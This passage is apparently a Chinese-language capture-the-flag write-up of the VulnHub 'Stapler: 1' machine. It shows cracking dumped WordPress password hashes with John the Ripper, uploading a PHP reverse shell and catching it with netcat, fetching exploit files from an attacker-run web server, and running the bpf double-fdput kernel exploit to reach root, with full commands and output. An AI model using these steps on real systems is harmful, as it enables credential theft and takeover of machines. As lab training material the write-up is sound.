| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+
16 rows in set (5.413 sec)

密碼看起來是被hash過,問題是它是用什麼hash演算法?

hash-identifier可以得到答案:

$ hash-identifier $P$B7889EMq/erHIuZapMB8GEizebcIy9.
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.
--------------------------------------------------
 HASH: $P$B7889EMq/erHIuZapMB8GEizebcIy9.

Possible Hashs:
[+] MD5(Wordpress)
--------------------------------------------------

是md5。

接下來就是解密。首先編輯一個1.txt,內容就是剛剛的使用者跟密碼:

+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+

因為現在只需要密碼,所以用以下指令,把1.txt的密碼欄位複製到pass.txt

$ awk -F'|' '{print $3}' 1.txt > pass.txt

$ cat pass.txt

 user_pass

 $P$B7889EMq/erHIuZapMB8GEizebcIy9.
 $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
 $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
 $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
 $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
 $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
 $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
 $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
 $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
 $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
 $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
 $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
 $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
 $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
 $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
 $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0

接下來就是解密,kali有自帶密碼破解工具john,使用的字典檔是位於/usr/share/wordlistsrockyou.txt,要解密的檔案是pass.txt。

但如果是第一次使用這個字典檔,則要先把它(rockyou.txt.gz)解壓縮:

$ cd /usr/share/wordlists/

$ ls
amass  dirbuster   fasttrack.txt  john.lst  metasploit  rockyou.txt.gz  sqlmap.txt  wifite.txt
dirb   dnsmap.txt  fern-wifi      legion    nmap.lst    seclists        wfuzz

$ sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
[sudo] password for nathan:

$ ls
amass  dirbuster   fasttrack.txt  john.lst  metasploit  rockyou.txt  sqlmap.txt  wifite.txt
dirb   dnsmap.txt  fern-wifi      legion    nmap.lst    seclists     wfuzz

接下來解密指令如下:

$ john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 16 password hashes with 16 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cookie           (?)
monkey           (?)
football         (?)
coolgirl         (?)
washere          (?)
incorrect        (?)
thumb            (?)
0520             (?)
passphrase       (?)
damachine        (?)
ylle             (?)
partyqueen       (?)
12g 0:00:13:32 DONE (2022-11-05 15:09) 0.01476g/s 17643p/s 84828c/s 84828C/s !!!@@@!!!..?*?7¡Vamos!?
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

雖然解密了,但不曉得解出來的明文跟哪一個密文對應,要去察看根目錄隱藏資料夾.john,裡面有john.pot可看。

$ cd

$ cd .john

$ pwd
/home/nathan/.john

$ ls
john.log  john.pot

$ cat john.pot
$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1:cookie
$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0:monkey
$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1:football
$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0:coolgirl
$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0:washere
$P$B7889EMq/erHIuZapMB8GEizebcIy9.:incorrect
$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0:thumb
$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0:0520
$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10:passphrase
$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.:damachine
$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0:ylle
$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1:partyqueen

這密碼順序跟1.txt裡的順序不同,要自己對對看,像第一個john它的密碼應該john.pot的第六個incorrect。

到之前也到過的登入頁面,用john/incorrect,登入後台:

0x02 Get Shell

利用wordpress的後台,上傳可以reverse shell的php檔。

點上圖紅圈處後到下圖,

再點上圖紅圈處,到下圖上傳檔案頁面。

kali自帶可以用來reverse shell的php檔,位置在/usr/share/webshells/php/php-reverse-shell.php

上傳之前要先編輯一下,把它打開後內容如下:

要改的是紅圈處,要把ip改成攻擊機的IP。至於port可以不用改,只是要記得等一下攻擊機在聽的時候要聽1234port。

在uploads頁面可看到剛剛上傳的php。

先在攻擊機上下指令nc -vlp 1234,接下來只要點擊網頁上的php-reverse-shell.php,即可get shell。

$ nc -vlp 1234
listening on [any] 1234 ...
connect to [172.22.137.180] from DESKTOP-NRNV04H.mshome.net [172.22.128.1] 60166
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 05:24:41 up 19:01,  0 users,  load average: 0.34, 19.69, 42.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/$

藉由python -c 'import pty;pty.spawn("/bin/bash")'來穩定shell。

0x03 提權

查找此靶機相關訊息:

www-data@red:/$ uname -mra
uname -mra
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@red:/$  cat /etc/*release*
 cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

發現是32位元,kernel 4.4.0-21,ubuntu 16.04。

$ searchsploit linux kernel 4.4
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege | linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)                                  | linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                   | linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Pr | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Conditio | windows_x86-64/local/47170.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Esc | linux/local/39277.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Esc | linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Esc | linux/local/39772.txt
...
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalatio | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)                                               | linux/dos/44301.c
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

只列出部分。要注意以下這一支感覺可以用的poc

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Pr | linux_x86-64/local/40049.c

是給64位linux,但靶機是32位,所以要用

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Esc | linux/local/39772.txt

把這支POC給複製過來,並查看裡面內容。

$ searchsploit -m 39772
  Exploit: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
      URL: https://www.exploit-db.com/exploits/39772
     Path: /usr/share/exploitdb/exploits/linux/local/39772.txt
File Type: C source, ASCII text

Copied to: /home/nathan/target_machine/stapler/39772.txt

$ ls
1.txt  39646.py  39772.txt  512237901.jpeg  hashfile  pass.txt  todo-list.txt  vsftpd.conf  wordpress-4.tar.gz

$ cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

        /* look for pseudo eBPF instructions that access map FDs and
         * replace them with actual map pointers
         */
        static int replace_map_fd_with_map_ptr(struct verifier_env *env)
        {
                struct bpf_insn *insn = env->prog->insnsi;
                int insn_cnt = env->prog->len;
                int i, j;

                for (i = 0; i < insn_cnt; i++, insn++) {
                        [checks for bad instructions]

                        if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                                struct bpf_map *map;
                                struct fd f;

                                [checks for bad instructions]

                                f = fdget(insn->imm);
                                map = __bpf_map_get(f);
                                if (IS_ERR(map)) {
                                        verbose("fd %d is not pointing to valid bpf_map\n",
                                                insn->imm);
                                        fdput(f);
                                        return PTR_ERR(map);
                                }

                                [...]
                        }
                }
                [...]
        }


__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
        if (!f.file)
                return ERR_PTR(-EBADF);
        if (f.file->f_op != &bpf_map_fops) {
                fdput(f);
                return ERR_PTR(-EINVAL);
        }

        return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.


One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

照著上面txt的指示,在攻擊機上下載相關工具並解壓縮:

$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2022-11-06 13:41:24--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 20.27.177.113
Connecting to github.com (github.com)|20.27.177.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2022-11-06 13:41:25--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: ‘39772.zip’

39772.zip                     100%[=================================================>]   6.86K  --.-KB/s    in 0s

2022-11-06 13:41:25 (119 MB/s) - ‘39772.zip’ saved [7025/7025]


$ ls
1.txt     39772.txt  512237901.jpeg  pass.txt       vsftpd.conf
39646.py  39772.zip  hashfile        todo-list.txt  wordpress-4.tar.gz


$ unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store
  inflating: 39772/crasher.tar
  inflating: __MACOSX/39772/._crasher.tar
  inflating: 39772/exploit.tar
  inflating: __MACOSX/39772/._exploit.tar


$ cd 39772


$ ls
crasher.tar  exploit.tar


$ tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c


$ ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar


$ cd ebpf_mapfd_doubleput_exploit/


$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c

在攻擊機上開一個server,讓靶機可以下載:

$ python -m SimpleHTTPServer 80
/usr/bin/python: No module named SimpleHTTPServer

$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.22.128.1 - - [06/Nov/2022 13:46:52] "GET / HTTP/1.1" 200 -
172.22.128.1 - - [06/Nov/2022 13:46:52] code 404, message File not found
172.22.128.1 - - [06/Nov/2022 13:46:52] "GET /favicon.ico HTTP/1.1" 404 -

開起來的網頁長這樣:

靶機透過以下指令下載上圖網頁上的攻擊腳本,並編譯執行:

www-data@red:/$ cd /tmp
cd /tmp
www-data@red:/tmp$ wget http://172.22.137.180:8000/compile.sh
wget http://172.22.137.180:8000/compile.sh
--2022-11-06 05:58:48--  http://172.22.137.180:8000/compile.sh
Connecting to 172.22.137.180:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 155 [text/x-sh]
Saving to: 'compile.sh'

compile.sh          100%[===================>]     155  --.-KB/s    in 0s

2022-11-06 05:58:48 (50.8 MB/s) - 'compile.sh' saved [155/155]

www-data@red:/tmp$ wget http://172.22.137.180:8000/doubleput.c
wget http://172.22.137.180:8000/doubleput.c
--2022-11-06 05:58:58--  http://172.22.137.180:8000/doubleput.c
Connecting to 172.22.137.180:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4188 (4.1K) [text/x-csrc]
Saving to: 'doubleput.c'

doubleput.c         100%[===================>]   4.09K  --.-KB/s    in 0s

2022-11-06 05:58:58 (670 MB/s) - 'doubleput.c' saved [4188/4188]

www-data@red:/tmp$ wget http://172.22.137.180:8000/hello.c
wget http://172.22.137.180:8000/hello.c
--2022-11-06 05:59:05--  http://172.22.137.180:8000/hello.c
Connecting to 172.22.137.180:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2186 (2.1K) [text/x-csrc]
Saving to: 'hello.c'

hello.c             100%[===================>]   2.13K  --.-KB/s    in 0s

2022-11-06 05:59:05 (591 MB/s) - 'hello.c' saved [2186/2186]

www-data@red:/tmp$ wget http://172.22.137.180:8000/suidhelper.c
wget http://172.22.137.180:8000/suidhelper.c
--2022-11-06 05:59:11--  http://172.22.137.180:8000/suidhelper.c
Connecting to 172.22.137.180:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 255 [text/x-csrc]
Saving to: 'suidhelper.c'

suidhelper.c        100%[===================>]     255  --.-KB/s    in 0s

2022-11-06 05:59:11 (76.3 MB/s) - 'suidhelper.c' saved [255/255]

www-data@red:/tmp$ chmod +x compile.sh
chmod +x compile.sh
www-data@red:/tmp$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@red:/tmp$ ls
ls
compile.sh  doubleput.c  hello.c     suidhelper.c
doubleput   hello        suidhelper  vmware-root
www-data@red:/tmp$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:/tmp#

提權成功。

找flag,這一次locate指令不能用,只能從root資料夾底下去找。

root@red:/# locate root
locate root
bash: locate: command not found
root@red:/# sudo ls -al /root
sudo ls -al /root
total 208
drwx------  4 root root  4096 Nov  6 05:56 .
drwxr-xr-x 22 root root  4096 Jun  7  2016 ..
-rw-------  1 root root     1 Jun  5  2016 .bash_history
-rw-r--r--  1 root root  3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root    50 Jun  3  2016 .my.cnf
-rw-------  1 root root     1 Jun  5  2016 .mysql_history
drwxr-xr-x 11 root root  4096 Jun  3  2016 .oh-my-zsh
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-------  1 root root  1024 Jun  5  2016 .rnd
drwxr-xr-x  2 root root  4096 Jun  4  2016 .vim
-rw-------  1 root root     1 Jun  5  2016 .viminfo
-rw-r--r--  1 root root 39206 Jun  3  2016 .zcompdump
-rw-r--r--  1 root root 39352 Jun  3  2016 .zcompdump-red-5.1.1
-rw-r--r--  1 root root    17 Jun  3  2016 .zsh-update
-rw-------  1 root root    39 Jun  5  2016 .zsh_history
-rw-r--r--  1 root root  2839 Jun  3  2016 .zshrc
-rwxr-xr-x  1 root root  1090 Jun  5  2016 fix-wordpress.sh
-rw-r--r--  1 root root   463 Jun  5  2016 flag.txt
-rw-r--r--  1 root root   345 Jun  5  2016 issue
-rwxr-xr-x  1 root root   103 Jun  5  2016 python.sh
-rw-r--r--  1 root root 54405 Jun  5  2016 wordpress.sql
root@red:/# cat /root/flag.txt
cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Reference

VMware 导入 ovf 文件格式异常报错之探解 | Secrypt Agency
[第8天]偵查-Samba - iT 邦幫忙::一起幫忙解決難題,拯救 IT 人的一天
红队渗透测试之Stapler-1——Wordpress后台getshell五种方法 - FreeBuf网络安全行业门户
VulnHub ‘Stapler: 1’ - CTF - Jack Hacks
https://www.c0dedead.io/stapler-walkthrough/
No.10-VulnHub-Stapler: 1-Walkthrough渗透学习_大余xiyou的博客-CSDN博客
John the Ripper (JTR) 密碼暴力破解工具 - 駭客貓咪 HackerCat
https://bond-o.medium.com/vulnhub-stapler-1-ab928900d614
Kali WPScan的使用(WordPress扫描工具)
VulnHub - Stapler: 1 Walkthrough - StefLan's Security Blog
[【Vulnhub】 Stapler:1 | Secrypt Agency


#VMware 导入 ovf 文件格式异常报错 #attack #Vulnhub #nmap #辨識hash類型 #解密 #John the Ripper (JTR) 密碼暴力破解工具 #wordpress #Wordpress后台getshell五种方法 #wpscan #wordpress外掛漏洞 #LFI #php reverse shell #39646 #39772 #32位元/linux kernel 4.4.0-21/ubuntu 16.04提權漏洞







Related Posts

C# The way to store a temporary data: Memory Cache, Redis

C# The way to store a temporary data: Memory Cache, Redis

JAVA筆記_網路程式設計

JAVA筆記_網路程式設計

[MSSQL] 常用預設資料庫('.', LocalDB...)

[MSSQL] 常用預設資料庫('.', LocalDB...)


Comments